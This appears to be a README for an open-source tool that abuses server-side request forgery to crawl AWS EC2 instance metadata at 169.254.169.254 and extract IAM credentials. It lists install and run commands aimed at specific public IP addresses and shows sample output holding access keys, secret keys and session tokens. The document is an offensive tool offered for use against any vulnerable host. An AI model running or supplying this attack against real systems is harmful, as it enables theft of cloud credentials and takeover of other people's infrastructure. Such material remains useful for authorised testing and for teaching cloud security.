A high-speed, threaded, and recursive AWS metadata enumerator that abuses SSRF vulnerabilities to extract EC2 instance metadata via http://169.254.169.254.
- Recursive crawling through all metadata folders and subfolders
- High-speed async implementation using
aiohttpandasyncio - Nested JSON-style result structure
- Works with any SSRF-vulnerable host reflecting a
url=parameter - Skips HTML/noise content, stores only valid data
git clone https://github.com/yarkhan02/aws-meta-crawler.git
cd aws-meta-crawler
pip install aiohttppython3 main.py <target_ip>python3 main.py 61.29.101.187Outputs structured metadata like:
{
"iam": {
"security-credentials": {
"cg-ec2-role": {
"AccessKeyId": "ASIA...",
"SecretAccessKey": "secret...",
"Token": "..."
}
}
},
"hostname": "ip-172-31-22-33.ec2.internal",
...
}This crawler abuses an SSRF vulnerability where the remote server allows you to call:
GET /?url=http://169.254.169.254/latest/meta-data/
It then:
- Crawls all sub-paths and folders recursively
- Fetches files only (not HTML)
- Builds a nested JSON dictionary of all keys/values
python3 main.py 54.92.181.147 > metadata.json
jq . metadata.json| Argument | Description |
|---|---|
target_ip |
IP address of SSRF-vulnerable web service |